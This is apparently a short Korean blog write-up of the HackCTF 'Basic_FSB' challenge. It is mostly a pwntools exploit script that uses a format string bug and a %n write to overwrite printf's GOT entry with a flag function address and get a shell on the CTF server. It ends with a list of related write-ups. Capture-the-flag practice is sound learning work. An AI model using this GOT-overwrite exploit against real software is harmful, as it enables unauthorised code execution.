
문제 이름에 FSB (Format String Bug)가 써져있다
Format String Bug가 맞는지 확인하기 위하여
input값에 확인해보았다.




fsb 이용 print got 를 flag주소로 덮어서 쉘획득
from pwn import * p = remote("ctf.j0n9hyun.xyz", 3002) e = ELF("./basic_fsb") pay = p32(e.got['printf']) pay += b"%134514096x%n" p.sendline(pay) p.interactive() p.close()

'Write-Up > HackCTF' 카테고리의 다른 글
[HackCTF] x64 Simple_size_BOF (0) | 2021.05.16 |
---|---|
[HackCTF] x64 Buffer Overflow (0) | 2021.05.16 |
[HackCTF] 내 버퍼가 흘러넘친다!!! (0) | 2021.05.15 |
[HackCTF] Basic_BOF #2 (0) | 2021.05.15 |
[HackCTF] Basic_BOF #1 (0) | 2021.05.15 |